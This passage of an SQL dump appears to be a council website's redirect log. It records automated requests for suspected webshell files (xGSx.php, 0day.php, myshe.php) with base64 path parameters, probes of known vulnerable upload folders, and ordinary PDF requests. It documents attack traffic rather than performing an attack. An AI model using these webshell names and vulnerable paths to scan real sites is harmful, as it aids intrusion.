00:00:00',301),(29370,'http://www.malyn-rayrada.gov.ua/cache/support.php?z3=Wm5JaFpaLnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:15:52','0000-00-00 00:00:00',301),(29371,'http://www.malyn-rayrada.gov.ua/RoseLeif.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:16:11','0000-00-00 00:00:00',301),(29372,'http://www.malyn-rayrada.gov.ua/Abbrevsprl.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:16:20','0000-00-00 00:00:00',301),(29373,'http://www.malyn-rayrada.gov.ua/show.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:16:38','0000-00-00 00:00:00',301),(29374,'http://www.malyn-rayrada.gov.ua/images/defau1t.php?z3=Wm5JaFpaLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:16:56','0000-00-00 00:00:00',301),(29375,'http://www.malyn-rayrada.gov.ua/cli/40dd1d.php?z3=Wm5JaFpaLnBocA==&z4=L2NsaS8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:17:17','0000-00-00 00:00:00',301),(29376,'http://www.malyn-rayrada.gov.ua/infos.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:17:40','0000-00-00 00:00:00',301),(29377,'http://www.malyn-rayrada.gov.ua/cache/defau1t.php?z3=Wm5JaFpaLnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:18:02','0000-00-00 00:00:00',301),(29378,'http://www.malyn-rayrada.gov.ua/bookmark.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:18:11','0000-00-00 00:00:00',301),(29379,'http://www.malyn-rayrada.gov.ua/configbak.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:18:34','0000-00-00 00:00:00',301),(29380,'http://www.malyn-rayrada.gov.ua/wp-data.php?z3=Wm5JaFpaLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:18:36','0000-00-00 00:00:00',301),(29381,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/Fbrrchive.php?z3=Wm5JaFpaLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:18:51','0000-00-00 00:00:00',301),(29382,'http://www.malyn-rayrada.gov.ua/wp-content/uploads/Fbrrchive.php?z3=Wm5JaFpaLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:19:15','0000-00-00 00:00:00',301),(29383,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/myshe.php?z3=Wm5JaFpaLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:19:44','0000-00-00 00:00:00',301),(29384,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-cache.php?z3=Wm5JaFpaLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:19:58','0000-00-00 00:00:00',301),(29385,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-footers.php?z3=Wm5JaFpaLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:20:14','0000-00-00 00:00:00',301),(29386,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wpfootes.php?z3=Wm5JaFpaLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:20:38','0000-00-00 00:00:00',301),(29387,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/sql_dump.php?z3=Wm5JaFpaLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:21:07','0000-00-00 00:00:00',301),(29388,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/SocketIontrol.php?z3=Wm5JaFpaLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:21:30','0000-00-00 00:00:00',301),(29389,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/SocketIasrgasfontrol.php?z3=Wm5JaFpaLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:21:43','0000-00-00 00:00:00',301),(29390,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/Analyser.php?z3=Wm5JaFpaLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:22:34','0000-00-00 00:00:00',301),(29391,'http://www.malyn-rayrada.gov.ua/cache/list.php?z3=Wm5JaFpaLnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-02-25 18:23:06','0000-00-00 00:00:00',301),(29392,'http://www.malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/ZnIhZZ.php',NULL,'','',1,0,'2017-02-25 18:28:42','0000-00-00 00:00:00',301),(29393,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/revslider/temp/update_extract/ZnIhZZ.php',NULL,'','',1,0,'2017-02-25 18:29:04','0000-00-00 00:00:00',301),(29394,'http://www.malyn-rayrada.gov.ua/wp-content/uploads/ZnIhZZ.php',NULL,'','',1,0,'2017-02-25 18:29:21','0000-00-00 00:00:00',301),(29395,'http://www.malyn-rayrada.gov.ua/ZnIhZZ.php',NULL,'','',1,0,'2017-02-25 18:29:38','0000-00-00 00:00:00',301),(29396,'http://www.malyn-rayrada.gov.ua/sites/all/libraries/elfinder/files/ZnIhZZ.php',NULL,'','',1,0,'2017-02-25 18:29:49','0000-00-00 00:00:00',301),(29397,'http://www.malyn-rayrada.gov.ua/xGSx.php',NULL,'http://www.malyn-rayrada.gov.ua/xGSx.php','',1,0,'2017-02-25 18:35:33','0000-00-00 00:00:00',301),(29398,'http://www.malyn-rayrada.gov.ua/attachments/article/1564/Інформація прокур.pdf',NULL,'','',2,0,'2017-02-25 19:10:46','0000-00-00 00:00:00',301),(29399,'http://www.malyn-rayrada.gov.ua/attachments/article/1572/Підсумки відкритого голосування 10 сесія7.pdf',NULL,'','',2,0,'2017-02-26 00:15:37','0000-00-00 00:00:00',301),(29400,'http://malyn-rayrada.gov.ua/_input_3_up.php',NULL,'http://malyn-rayrada.gov.ua/_input_3_up.php','',1,0,'2017-02-26 04:50:21','0000-00-00 00:00:00',301),(29401,'http://malyn-rayrada.gov.ua/xGSx.php',NULL,'http://malyn-rayrada.gov.ua/xGSx.php','',1,0,'2017-02-26 05:51:55','0000-00-00 00:00:00',301),(29402,'http://www.malyn-rayrada.gov.ua/attachments/article/1531/Підсумки відкритого поіменного голосування 9 сесія.pdf',NULL,'','',2,0,'2017-02-26 22:47:38','0000-00-00 00:00:00',301),(29403,'http://malyn-rayrada.gov.ua/ws.php',NULL,'http://malyn-rayrada.gov.ua/ws.php','',2,0,'2017-02-27 02:27:22','0000-00-00 00:00:00',301),(29404,'http://www.malyn-rayrada.gov.ua/test/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/test/logo_img.php','',1,0,'2017-02-27 14:26:20','0000-00-00 00:00:00',301),(29405,'http://malyn-rayrada.gov.ua/test/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/test/logo_img.php','',1,0,'2017-02-28 02:46:02','0000-00-00 00:00:00',301),(29406,'http://www.malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/ws0.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/ws0.php','',2,0,'2017-02-28 17:54:06','0000-00-00 00:00:00',301),(29407,'http://malyn-rayrada.gov.ua/tmp/upxx.php',NULL,'http://malyn-rayrada.gov.ua/tmp/upxx.php','',4,0,'2017-03-01 06:01:48','0000-00-00 00:00:00',301),(29408,'http://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/ws0.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/ws0.php','',2,0,'2017-03-01 06:10:02','0000-00-00 00:00:00',301),(29409,'http://www.malyn-rayrada.gov.ua/s.php?waled',NULL,'http://www.malyn-rayrada.gov.ua/s.php?waled','',1,0,'2017-03-01 16:57:52','0000-00-00 00:00:00',301),(29410,'http://malyn-rayrada.gov.ua/97376302-13ea-4dd8-a402-ce56b59c5dd1',NULL,'','',1,0,'2017-03-03 15:20:41','0000-00-00 00:00:00',301),(29411,'http://www.malyn-rayrada.gov.ua/images/1ndex.php?z3=MGZFTEhhLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:03:15','0000-00-00 00:00:00',301),(29412,'http://www.malyn-rayrada.gov.ua/sqlbak.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:03:33','0000-00-00 00:00:00',301),(29413,'http://www.malyn-rayrada.gov.ua/email.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:03:45','0000-00-00 00:00:00',301),(29414,'http://www.malyn-rayrada.gov.ua/functions.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:04:00','0000-00-00 00:00:00',301),(29415,'http://www.malyn-rayrada.gov.ua/cache/news.php?z3=MGZFTEhhLnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:04:22','0000-00-00 00:00:00',301),(29416,'http://www.malyn-rayrada.gov.ua/tmp.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',4,0,'2017-03-04 16:04:39','0000-00-00 00:00:00',301),(29417,'http://www.malyn-rayrada.gov.ua/shootme.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:04:46','0000-00-00 00:00:00',301),(29418,'http://www.malyn-rayrada.gov.ua/robots.txt.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:05:10','0000-00-00 00:00:00',301),(29419,'http://www.malyn-rayrada.gov.ua/jconfig.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:05:29','0000-00-00 00:00:00',301),(29420,'http://www.malyn-rayrada.gov.ua/media/reads.php?z3=MGZFTEhhLnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:05:48','0000-00-00 00:00:00',301),(29421,'http://www.malyn-rayrada.gov.ua/media/1ndex.php?z3=MGZFTEhhLnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:06:10','0000-00-00 00:00:00',301),(29422,'http://www.malyn-rayrada.gov.ua/sql_dump.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:06:40','0000-00-00 00:00:00',301),(29423,'http://www.malyn-rayrada.gov.ua/images/laj.php?z3=MGZFTEhhLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:07:02','0000-00-00 00:00:00',301),(29424,'http://www.malyn-rayrada.gov.ua/media/404.php?z3=MGZFTEhhLnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:07:50','0000-00-00 00:00:00',301),(29425,'http://www.malyn-rayrada.gov.ua/media/tmp.php?z3=MGZFTEhhLnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:08:06','0000-00-00 00:00:00',301),(29426,'http://www.malyn-rayrada.gov.ua/r3x.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:08:32','0000-00-00 00:00:00',301),(29427,'http://www.malyn-rayrada.gov.ua/images/stories/0day.php?z3=MGZFTEhhLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:09:16','0000-00-00 00:00:00',301),(29428,'http://www.malyn-rayrada.gov.ua/includes/u2p.php?z3=MGZFTEhhLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:09:38','0000-00-00 00:00:00',301),(29429,'http://www.malyn-rayrada.gov.ua/images/xxx.php?z3=MGZFTEhhLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:10:08','0000-00-00 00:00:00',301),(29430,'http://www.malyn-rayrada.gov.ua/al277.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:10:29','0000-00-00 00:00:00',301),(29431,'http://www.malyn-rayrada.gov.ua/cache/cache_aqbmkwwx.php?z3=MGZFTEhhLnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:10:44','0000-00-00 00:00:00',301),(29432,'http://www.malyn-rayrada.gov.ua/install.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:11:07','0000-00-00 00:00:00',301),(29433,'http://www.malyn-rayrada.gov.ua/dswat.org/wsdl.php?z3=MGZFTEhhLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:11:19','0000-00-00 00:00:00',301),(29434,'http://www.malyn-rayrada.gov.ua/robot.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:11:34','0000-00-00 00:00:00',301),(29435,'http://www.malyn-rayrada.gov.ua/wsdl.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:11:57','0000-00-00 00:00:00',301),(29436,'http://www.malyn-rayrada.gov.ua/site/tmp/cTivrC.php?z3=MGZFTEhhLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:12:43','0000-00-00 00:00:00',301),(29437,'http://www.malyn-rayrada.gov.ua/wp-main.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:13:49','0000-00-00 00:00:00',301),(29438,'http://www.malyn-rayrada.gov.ua/images/al277.php?z3=MGZFTEhhLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:15:12','0000-00-00 00:00:00',301),(29439,'http://www.malyn-rayrada.gov.ua/webconfig.txt.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:15:45','0000-00-00 00:00:00',301),(29440,'http://www.malyn-rayrada.gov.ua/thumb.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:16:59','0000-00-00 00:00:00',301),(29441,'http://www.malyn-rayrada.gov.ua/SessionController.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:18:28','0000-00-00 00:00:00',301),(29442,'http://www.malyn-rayrada.gov.ua/maill.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:18:48','0000-00-00 00:00:00',301),(29443,'http://www.malyn-rayrada.gov.ua/error-log.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:19:17','0000-00-00 00:00:00',301),(29444,'http://www.malyn-rayrada.gov.ua/authenticating.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:19:28','0000-00-00 00:00:00',301),(29445,'http://www.malyn-rayrada.gov.ua/images/google-assist.php?z3=MGZFTEhhLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:20:12','0000-00-00 00:00:00',301),(29446,'http://www.malyn-rayrada.gov.ua/images/robots.txt.php?z3=MGZFTEhhLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:20:45','0000-00-00 00:00:00',301),(29447,'http://www.malyn-rayrada.gov.ua/elements.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:21:10','0000-00-00 00:00:00',301),(29448,'http://www.malyn-rayrada.gov.ua/xmlsrpc.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:21:19','0000-00-00 00:00:00',301),(29449,'http://www.malyn-rayrada.gov.ua/wp-cache.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:21:42','0000-00-00 00:00:00',301),(29450,'http://www.malyn-rayrada.gov.ua/images/404.php?z3=MGZFTEhhLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:21:58','0000-00-00 00:00:00',301),(29451,'http://www.malyn-rayrada.gov.ua/images/head.php?z3=MGZFTEhhLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:22:12','0000-00-00 00:00:00',301),(29452,'http://www.malyn-rayrada.gov.ua/cache/support.php?z3=MGZFTEhhLnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:22:42','0000-00-00 00:00:00',301),(29453,'http://www.malyn-rayrada.gov.ua/RoseLeif.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:23:01','0000-00-00 00:00:00',301),(29454,'http://www.malyn-rayrada.gov.ua/Abbrevsprl.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:23:18','0000-00-00 00:00:00',301),(29455,'http://www.malyn-rayrada.gov.ua/show.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:23:35','0000-00-00 00:00:00',301),(29456,'http://www.malyn-rayrada.gov.ua/images/defau1t.php?z3=MGZFTEhhLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:23:55','0000-00-00 00:00:00',301),(29457,'http://www.malyn-rayrada.gov.ua/cli/40dd1d.php?z3=MGZFTEhhLnBocA==&z4=L2NsaS8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:24:30','0000-00-00 00:00:00',301),(29458,'http://www.malyn-rayrada.gov.ua/infos.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:24:56','0000-00-00 00:00:00',301),(29459,'http://www.malyn-rayrada.gov.ua/cache/defau1t.php?z3=MGZFTEhhLnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:25:25','0000-00-00 00:00:00',301),(29460,'http://www.malyn-rayrada.gov.ua/bookmark.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:25:41','0000-00-00 00:00:00',301),(29461,'http://www.malyn-rayrada.gov.ua/configbak.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:25:44','0000-00-00 00:00:00',301),(29462,'http://www.malyn-rayrada.gov.ua/wp-data.php?z3=MGZFTEhhLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:26:04','0000-00-00 00:00:00',301),(29463,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/Fbrrchive.php?z3=MGZFTEhhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:26:43','0000-00-00 00:00:00',301),(29464,'http://www.malyn-rayrada.gov.ua/wp-content/uploads/Fbrrchive.php?z3=MGZFTEhhLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:27:09','0000-00-00 00:00:00',301),(29465,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/myshe.php?z3=MGZFTEhhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:27:15','0000-00-00 00:00:00',301),(29466,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-cache.php?z3=MGZFTEhhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:27:29','0000-00-00 00:00:00',301),(29467,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-footers.php?z3=MGZFTEhhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:27:39','0000-00-00 00:00:00',301),(29468,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wpfootes.php?z3=MGZFTEhhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:27:54','0000-00-00 00:00:00',301),(29469,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/sql_dump.php?z3=MGZFTEhhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:28:12','0000-00-00 00:00:00',301),(29470,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/SocketIontrol.php?z3=MGZFTEhhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:28:29','0000-00-00 00:00:00',301),(29471,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/SocketIasrgasfontrol.php?z3=MGZFTEhhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:28:59','0000-00-00 00:00:00',301),(29472,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/Analyser.php?z3=MGZFTEhhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:29:43','0000-00-00 00:00:00',301),(29473,'http://www.malyn-rayrada.gov.ua/cache/list.php?z3=MGZFTEhhLnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-04 16:29:50','0000-00-00 00:00:00',301),(29474,'http://www.malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/0fELHa.php',NULL,'','',1,0,'2017-03-04 16:37:15','0000-00-00 00:00:00',301),(29475,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/revslider/temp/update_extract/0fELHa.php',NULL,'','',1,0,'2017-03-04 16:37:24','0000-00-00 00:00:00',301),(29476,'http://www.malyn-rayrada.gov.ua/wp-content/uploads/0fELHa.php',NULL,'','',1,0,'2017-03-04 16:37:38','0000-00-00 00:00:00',301),(29477,'http://www.malyn-rayrada.gov.ua/0fELHa.php',NULL,'','',1,0,'2017-03-04 16:37:56','0000-00-00 00:00:00',301),(29478,'http://www.malyn-rayrada.gov.ua/sites/all/libraries/elfinder/files/0fELHa.php',NULL,'','',1,0,'2017-03-04 16:38:12','0000-00-00 00:00:00',301),(29479,'http://www.malyn-rayrada.gov.ua/tmpx.php',NULL,'http://www.malyn-rayrada.gov.ua/tmpx.php','',1,0,'2017-03-05 06:25:58','0000-00-00 00:00:00',301),(29480,'http://malyn-rayrada.gov.ua/attachments/article/1577/ÐŸÑ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ відкритого Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ  11 позачергова Ñ ÐµÑ Ñ–Ñ 7.pdf',NULL,'','',2,0,'2017-03-05 06:50:13','0000-00-00 00:00:00',301),(29481,'http://malyn-rayrada.gov.ua/tmpx.php',NULL,'http://malyn-rayrada.gov.ua/tmpx.php','',1,0,'2017-03-05 16:12:39','0000-00-00 00:00:00',301),(29482,'http://www.malyn-rayrada.gov.ua/attachments/article/2/Декларація Ничипоренко за 2015 рік.pdf',NULL,'','',2,0,'2017-03-05 18:18:42','0000-00-00 00:00:00',301),(29483,'http://malyn-rayrada.gov.ua/leaf.php',NULL,'http://malyn-rayrada.gov.ua/leaf.php','',1,0,'2017-03-07 01:25:04','0000-00-00 00:00:00',301),(29484,'http://www.malyn-rayrada.gov.ua/alb.php',NULL,'http://www.malyn-rayrada.gov.ua/alb.php','',1,0,'2017-03-08 04:21:04','0000-00-00 00:00:00',301),(29485,'http://www.malyn-rayrada.gov.ua/includes/component.php',NULL,'http://www.malyn-rayrada.gov.ua/includes/component.php','',1,0,'2017-03-08 04:21:05','0000-00-00 00:00:00',301),(29486,'http://www.malyn-rayrada.gov.ua/mod_footer.php',NULL,'http://www.malyn-rayrada.gov.ua/mod_footer.php','',1,0,'2017-03-08 04:28:37','0000-00-00 00:00:00',301),(29487,'http://malyn-rayrada.gov.ua/mod_footer.php',NULL,'http://malyn-rayrada.gov.ua/mod_footer.php','',1,0,'2017-03-08 14:09:43','0000-00-00 00:00:00',301),(29488,'http://malyn-rayrada.gov.ua/includes/component.php',NULL,'http://malyn-rayrada.gov.ua/includes/component.php','',1,0,'2017-03-08 14:14:22','0000-00-00 00:00:00',301),(29489,'http://malyn-rayrada.gov.ua/alb.php',NULL,'http://malyn-rayrada.gov.ua/alb.php','',1,0,'2017-03-08 14:14:41','0000-00-00 00:00:00',301),(29490,'http://malyn-rayrada.gov.ua/index.php/1681-vitaemo-iz-8-bereznya',NULL,'','',38,0,'2017-03-15 15:51:35','0000-00-00 00:00:00',301),(29491,'http://malyn-rayrada.gov.ua/index.php/1680-do-vidoma-deputativ-rajonnoji-radi',NULL,'','',29,0,'2017-03-15 15:51:39','0000-00-00 00:00:00',301),(29492,'http://malyn-rayrada.gov.ua/images/1ndex.php?z3=dUJrcUo2LnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:19:07','0000-00-00 00:00:00',301),(29493,'http://malyn-rayrada.gov.ua/sqlbak.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:19:19','0000-00-00 00:00:00',301),(29494,'http://malyn-rayrada.gov.ua/email.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:20:12','0000-00-00 00:00:00',301),(29495,'http://malyn-rayrada.gov.ua/functions.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:20:41','0000-00-00 00:00:00',301),(29496,'http://malyn-rayrada.gov.ua/cache/news.php?z3=dUJrcUo2LnBocA==&z4=L2NhY2hlLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:21:06','0000-00-00 00:00:00',301),(29497,'http://malyn-rayrada.gov.ua/tmp.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',4,0,'2017-03-17 00:21:30','0000-00-00 00:00:00',301),(29498,'http://malyn-rayrada.gov.ua/configurationbak.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:22:00','0000-00-00 